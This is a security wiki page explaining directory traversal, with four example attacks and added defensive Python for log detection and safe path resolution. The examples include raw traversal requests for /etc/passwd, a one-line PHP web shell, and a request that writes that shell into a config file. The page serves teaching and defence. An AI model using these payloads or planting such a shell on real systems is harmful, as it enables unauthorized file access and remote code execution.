info ‐ Directory Traversal - taylorjohn/hacking GitHub Wiki

Directory Traversal (Path Traversal)

Directory traversal, also known as path traversal or directory climbing, is a common web security vulnerability that lets attackers read or write files and directories outside the directory the application intends to expose. Exploiting it allows attackers to navigate the server's file system to reach sensitive files, execute arbitrary code, or modify application behavior. This wiki page gives an overview of directory traversal, its impact, common attack vectors, prevention techniques, and several worked examples with descriptions.

Description

Directory traversal occurs when an attacker manipulates user input that the application turns into a file path, so that the resulting path points outside the scope the application intended. Where input validation is inadequate or file paths are handled improperly, the attacker can reach directories containing sensitive files or, depending on the configuration, cause malicious code to run on the server.

Impact

Directory traversal vulnerabilities pose significant risks: unauthorized access to sensitive files, disclosure of critical information, and execution of arbitrary code. The impact ranges from data breaches and information leakage to complete compromise of the web application and the server it runs on.

Common Attack Vectors

Attackers exploit directory traversal vulnerabilities through various attack vectors, including:

  • HTTP requests
  • File upload forms
  • Parameters passed through URLs or input fields

Examples of Directory Traversal Attacks

  1. Accessing Sensitive Files:

    • Description: Attackers attempt to access sensitive files, such as configuration files or password databases, by traversing the directory structure.
    • Example: Accessing /etc/passwd or /etc/shadow files on Unix-based systems.
    • Code Example (HTTP GET Request):
      GET /download?file=../../../../etc/passwd HTTP/1.1
      Host: example.com
      
  2. Executing Arbitrary Code:

    • Description: Attackers upload malicious files to the server and use directory traversal to reach and execute them, leading to remote code execution.
    • Example: Uploading a PHP web shell and executing it via directory traversal.
    • Code Example (PHP Web Shell):
      <?php
      system($_GET['cmd']);
      ?>
      
      Usage: http://example.com/uploads/shell.php?cmd=ls

  3. Reading or Writing Files:

    • Description: Attackers read or write files outside the intended directory structure, potentially modifying application behavior or injecting malicious content.
    • Example: Writing a malicious script into the web application's configuration file to execute arbitrary commands.
    • Code Example (File Write):
      POST /update-config HTTP/1.1
      Host: example.com
      Content-Type: application/x-www-form-urlencoded
      
      config_path=../../../../var/www/html/config.php&content=<?php system($_GET['cmd']); ?>
      
      Usage: http://example.com/config.php?cmd=ls

  4. Bypassing Access Controls:

    • Description: Attackers bypass access controls by navigating to restricted directories or files.
    • Example: Accessing administrative files or user-specific data by traversing directories.
    • Code Example (Restricted Directory Access):
      GET /view-profile?user=../../../../admin/secret-profile HTTP/1.1
      Host: example.com
      

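From a defender's side, the four requests above leave a recognisable trace in web-server access logs: a `..` segment in the request path or in a query parameter. The following script is an added example, not part of the original wiki page, that parses constructed Common Log Format lines (the IPs are from the documentation range and the lines are made up for this demo) and reports each request carrying such a segment. It percent-decodes before matching and tests whole path segments rather than substrings, so a legitimate name like `report..pdf` is not flagged.

```python
# Added example (not from the wiki page): flag directory-traversal attempts in
# web-server access logs. The log lines below are constructed for the demo and
# mirror the requests shown on this page; IPs are from the documentation range.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /download?file=../../../../etc/passwd HTTP/1.1" 200 1024
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /download?file=report.pdf HTTP/1.1" 200 5120
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /view-profile?user=..%2F..%2F..%2F..%2Fadmin%2Fsecret-profile HTTP/1.1" 403 0
198.51.100.7 - - [10/Oct/2023:13:56:05 +0000] "GET /static/img/logo.png HTTP/1.1" 200 2048
"""

# Common Log Format: client ident user [timestamp] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def has_traversal(value: str) -> bool:
    """True when a path-like value contains a '..' *segment* after percent-decoding.

    Testing whole segments (split on '/' or '\\') avoids false positives on
    legitimate names such as 'report..pdf' while still catching '..%2F..'.
    """
    decoded = unquote(value)
    return ".." in re.split(r"[\\/]+", decoded)


def find_traversal_attempts(log_text: str) -> list:
    """Return one record per request whose path or query carries a '..' segment."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than crash the scan
        parts = urlsplit(m["target"])
        indicators = []
        if has_traversal(parts.path):
            indicators.append(("path", parts.path))
        # parse_qsl already percent-decodes values; has_traversal decodes once more
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if has_traversal(value):
                indicators.append((key, value))
        if indicators:
            hits.append({
                "ip": m["ip"],
                "timestamp": m["ts"],
                "target": m["target"],
                "status": int(m["status"]),  # a 2xx on a flagged request needs triage first
                "indicators": indicators,
            })
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["target"], hit["indicators"])
```

The status code is kept in each record because it decides the urgency: a flagged request that returned 200 suggests the file was actually served and should be investigated before a 403 that the application already refused.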
Protection and Prevention

Mitigating directory traversal vulnerabilities requires proper input validation, path canonicalization, and access controls. Key preventive measures include:

  • Input validation that rejects path separators and `..` segments, ideally by allow-listing the filenames the endpoint is expected to serve
  • Canonicalization techniques that convert user-supplied paths to absolute paths and then verify the result still lies inside the intended base directory
  • Proper file permissions to restrict access to sensitive files
  • Deployment of Web Application Firewalls (WAFs) to detect and block malicious requests
  • Regular security testing, including code reviews and penetration testing, to identify and remediate vulnerabilities
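To make the first two measures concrete, here is an added example (written for this page, not code from the wiki or from any project it names) showing the naive path join behind the `GET /download?file=...` request beside a hardened resolver. The base directory `/srv/app/files` and the filenames are hypothetical. Layer 1 is an allow-list that accepts only a single plain filename; layer 2 canonicalises base plus input with `Path.resolve()` and refuses anything that does not land strictly below the base, which also catches absolute paths and symlinks pointing out of the tree.

```python
# Added example (not from the wiki page): a naive file-download resolver beside a
# hardened one that applies an allow-list and a canonicalisation check.
# The base directory and filenames are hypothetical.
import os
import re
from pathlib import Path

# Allow-list for a single filename: starts alphanumeric, no separators, no NUL.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")


def resolve_vulnerable(base: str, user_supplied: str) -> str:
    """Naive join, as in the page's GET /download?file=... example.

    '..' segments walk above base, and an absolute user_supplied path makes
    os.path.join discard base altogether.
    """
    return os.path.normpath(os.path.join(base, user_supplied))


def validate_filename(user_supplied: str) -> bool:
    """Layer 1: accept only one plain path component."""
    if "\x00" in user_supplied or user_supplied in (".", ".."):
        return False
    return SAFE_NAME.fullmatch(user_supplied) is not None


def is_within(base_dir: Path, candidate: Path) -> bool:
    """True when candidate is strictly below base_dir (both already canonical)."""
    return base_dir in candidate.parents


def resolve_safe(base: str, user_supplied: str) -> Path:
    """Layer 2: canonicalise base + input, then confirm it stays inside base.

    Path.resolve() collapses '.' and '..' and follows symlinks on the part of
    the path that exists, so the containment test runs on the real location.
    Raises PermissionError when the request escapes (or equals) the base.
    """
    base_dir = Path(base).resolve()
    candidate = (base_dir / user_supplied).resolve()
    if not is_within(base_dir, candidate):
        raise PermissionError(f"refusing path outside {base_dir}: {user_supplied!r}")
    return candidate


def check_download(base: str, user_supplied: str, allow_subdirs: bool = False) -> tuple:
    """Apply both layers; returns (allowed, reason, resolved path or None).

    allow_subdirs=True skips the single-component allow-list for endpoints
    that legitimately serve 'reports/q1.txt'; the canonicalisation check
    still applies.
    """
    if not allow_subdirs and not validate_filename(user_supplied):
        return (False, "filename failed allow-list", None)
    try:
        resolved = resolve_safe(base, user_supplied)
    except PermissionError as exc:
        return (False, str(exc), None)
    return (True, "ok", str(resolved))


if __name__ == "__main__":
    base = "/srv/app/files"  # hypothetical download root
    print(resolve_vulnerable(base, "../../../../etc/passwd"))  # escapes the root
    print(check_download(base, "report.pdf"))
    print(check_download(base, "../../../../etc/passwd"))
    print(check_download(base, "reports/q1.txt", allow_subdirs=True))
    print(check_download(base, "../../../../etc/passwd", allow_subdirs=True))
```

Note that the containment test compares canonical paths, not strings: a prefix check such as `str(candidate).startswith(base)` would accept `/srv/app/files-old/secret` for a base of `/srv/app/files`, which is why `is_within` walks `candidate.parents` instead. The third preventive measure, file permissions, still matters as a backstop: the process serving downloads should not be able to read `/etc/shadow` or write to the web root even if a check is bypassed.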

By addressing directory traversal vulnerabilities proactively, organizations can enhance the security of their web applications and protect against unauthorized access and data breaches.